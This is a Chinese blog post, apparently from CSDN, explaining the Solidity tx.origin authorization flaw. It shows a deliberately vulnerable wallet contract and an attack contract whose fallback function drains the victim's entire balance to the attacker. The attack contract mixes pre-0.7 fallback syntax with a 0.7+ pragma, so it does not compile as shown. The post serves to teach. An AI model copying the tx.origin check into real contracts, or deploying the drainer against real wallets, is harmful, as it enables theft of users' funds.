智能合约漏洞——to.origin 判定

最新推荐文章于 2024-05-28 16:43:25 发布
最新推荐文章于 2024-05-28 16:43:25 发布
阅读量944 收藏
点赞数
分类专栏: 区块链 文章标签: 区块链
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/S123456215/article/details/117354739
版权

还记得全局函数 tx.origin 和 msg.sender 的区别吗?tx.origin 表示的是触发当前函数执行的原始的交易发送者,msg.sender 表示的是调用当前函数的直接消息发送者,在智能合约函数调用其他智能合约函数时,这两个发送者是不同的。

漏洞合约示例:

// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.7.0 <0.9.0;

// 不要使用这个合约,其中包含一个 bug。
contract TxUserWallet {
    address owner;

    constructor() {
        owner = msg.sender;
    }

    function transferTo(address dest, uint amount) public {
        require(tx.origin == owner);
        dest.transfer(amount);
    }
}

现在有人欺骗你,将 以太币Ether发送到了这个恶意钱包的地址:

// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.7.0 <0.9.0;

interface TxUserWallet {
    function transferTo(address dest, uint amount) public;
}

contract TxAttackWallet {
    address payable owner;

    constructor() {
        owner = payable(msg.sender);
    }

    function() public {
        TxUserWallet(msg.sender).transferTo(owner, msg.sender.balance);
    }
}

如果你的钱包通过核查 msg.sender 来验证发送方身份,你就会得到恶意钱包的地址,而不是所有者的地址。 但是通过核查 tx.origin ,得到的就会是启动交易的原始地址,它仍然会是所有者的地址。 恶意钱包会立即将你的资金抽出。

 

虎皮熊233
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
十大DeFi安全实践
ChainlinkO的博客
01-23 5150
从可重入攻击到价格预言机漏洞利用,以下是作为DeFi开发人员需要注意的漏洞以及用于保护dApp的成熟解决方案。
047.Solidity入门——34自毁合约
qq_35369459的博客
03-02 593
Solidity——自毁合约
区块链开发(十)区块链技术-智能合约Solidity编程语言
jambeau的博客
12-13 1780
【文档翻译系列】Solidity语言 Solidity是一种智能合约高级语言,运行在Ethereum虚拟机(EVM)之上。 Solidity与其它语言相关的特点? 它的语法接近于Javascript,是一种面向对象的语言。但作为一种真正意义上运行在网络上的去中心合约,它又有很多的不同,下面列举一些: 以太坊底层是基于帐户,而非UTXO的,所以有一个特殊的Address的类型。用于定位用
Solidity&Foundry 安全审计测试 tx.origin 漏洞
最新发布
The future is already here it's just not evenly distributed。
05-28 442
在 Attack.attack() 中,它要求将 Alice 钱包中的所有资金转移到 Eve 的地址。由于 Wallet.transfer() 中的 tx.origin 等于 Alice 的地址、就授权了转账。钱包是一个简单的合约,只有所有者才能将以太币转移到另一个地址。由于tx.origin可能存在安全隐患,因此建议始终使用msg.sender进行授权或检查调用智能合约的地址。指调用智能合约功能的账户地址,只有账户地址可以是tx.origin。指直接调用智能合约功能的帐户或智能合约的地址。
区块链智能合约solidity的中的一些关键字
尘的学习记录
07-05 6374
在学习solidity过程中总结的一些关键字,以及它们的用法介绍
Solidity中将address转换为address payable的方法
q_776355102的博客
08-18 587
在solidity中直接通过address调用转账方法,偶尔会出现“Type address is not implicitly convertible to expected type address payable”,这时有两种方法可解决(以msg.sender为普通地址举例):
IOS应用源码——UIViewBasic.rar
10-14
这个"IOS应用源码——UIViewBasic.rar"很可能是包含了关于如何使用UIView以及其基础功能的示例代码。在iOS的UIKit框架中,UIView类是所有视图类的基类,包括UIButton、UILabel、UIImageView等。下面我们将深入探讨...
发现一款牛逼的 IDEA 插件:检测代码漏洞,一键修复!(csdn)————程序.pdf
12-05
6. **其他安全漏洞**:包括但不限于RegexDos风险、不安全的消息摘要算法、过时的加密标准、LDAP反序列化风险、宽泛的CORS Allowed Origin设置、SpringSecurity关闭Debug模式、硬编码凭证风险等。 对于这些规则,...
临床助理医师知识点——发热.docx
12-29
### 临床助理医师知识点——发热 #### 发热概述 发热是指由于各种原因导致人体产热过多而散热不足,使得体温超出正常范围的现象。通常情况下,根据体温的不同阶段,发热可分为低热(37.3℃~38.0℃)、中等度热...
python list的deepcopy过慢(csdn)————程序.pdf
12-03
为了比较这些方法的性能,作者编写了一个简单的基准测试,对包含30x30嵌套整数列表的`origin_list`进行10000次深拷贝,并记录每种方法所需的时间。测试结果会揭示哪种方法在速度上更优。 需要注意的是,选择最佳...
古老的Solidity智能合约错误代码编写
01-08
在Solidity0.4.23版本的时候,有人在GitHub上列举了一些使用Solidity编写智能合约时常见的错误用法。虽然现在大家基本上都不会再写同样的问题代码,但是重新学习一下仍然有着借鉴意义。 1、tx.origin 错误用法:...
solidity基础语法与简单案例20221203
H_Roger的博客
12-04 490
拍卖、creat2
区块链合约安全系列(一)公链合约权限校验引发的严重安全问题
BSN_yanxishe的博客
04-27 660
id:BSN_2021 公众号:BSN研习社 背景:由于公链环境下所有的信息都是共享的,智能合约相当于是透明的,任何人只需知道其地址就可以调用内部的方法,所以开发者在开发合约时,逻辑判断一般会添加一下权限的校验,以提高其安全性。但是有时候对其了解不深,会带来一些潜在的隐藏bug。 目标:验证当合约内部使用 tx.origin 做权限校验时,攻击者可以绕过逻辑约束进行资金盗取。 对象:适用于用Solidity语言开发的智能合约,例如BSN中的武汉链(基于ETH)和泰安链(基于 fisco b
solidity -- 合约
一只路过的小码农cxy
05-09 1047
在不同的合约(实例)上调用函数将执行 EVM 函数调用,从而切换上下文,使得调用合约中的状态变量不可访问。编译器生成的合约创建代码将在合约返回之前修改合约的运行时代码,方法是将所有对不可变对象的引用替换为分配给它们的值。内部可见性函数访问可以在当前合约或派生的合约访问,不可以外部访问。的变量受到的限制要少一些:可以在合约的构造函数中或在声明时为不可变变量分配任意值。只能使用在当前合约或在基类合约中定义的 修改器modifier , 修改器modifier 也可以定义在库里面,但是他们被限定在库函数使用。
区块链合约安全系列(三):如何认识及预防公链合约中的自毁攻击
BSN_yanxishe的博客
07-15 1617
id:BSN_2021 公众号:BSN 研习社 作者:红枣科技张雪良 背景:由于公链环境下所有的信息都是共享的,智能合约相当于是完全透明化,任何人都可以调用,外加一些利益的驱动,导致引发了很多hacker的攻击。其中self destruct攻击也是常见的攻击方式之一。 目标:将目标合约瘫痪掉,无法做正常的业务,从而认识以及预防自毁攻击漏洞。 对象:适用于用Solidity语言开发的智能合约,例如BSN中的武汉链(基于ETH)和泰安链(基于 fisco bcos)上运行的智能合约。 前言 在进入
智能合约-测试水龙头
zyzyzz的博客
02-25 294
// SPDX-License-Identifier: GPL-3.0 pragma solidity >=0.7.0 <0.9.0; // 智能合约实现水龙头功能 contract Faucet { // Accept any incoming amount 接收函数为空 ,表示它不做任何事情,除了接受以太 receive() external payable {} // Give out ether to anyone who asks // 该函.
官方案例——智能合约(0.8.0_solidity)
fengjinghong的博客
01-16 1852
1、简单的公开拍卖 以下简单的拍卖合约的总体思路是每个人都可以在投标期内发送他们的出价。 出价已经包含了资金/以太币,来将投标人与他们的投标绑定。 如果最高出价提高了(被其他出价者的出价超过),之前出价最高的出价者可以拿回她的钱。 在投标期结束后,受益人需要手动调用合约来接收他的钱 - 合约不能自己激活接收。 // SPDX-License-Identifier: GPL-3.0 pragma solidity ^0.7.0; contract SimpleAuction { // 拍卖的参数。
window.location.origin
03-16
`window.location.origin` 是 JavaScript 中的一个属性,它...例如,如果当前页面的 URL 是 `https://www.example.com:8080/path/to/page`,那么 `window.location.origin` 的值就是 `https://www.example.com:8080`。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值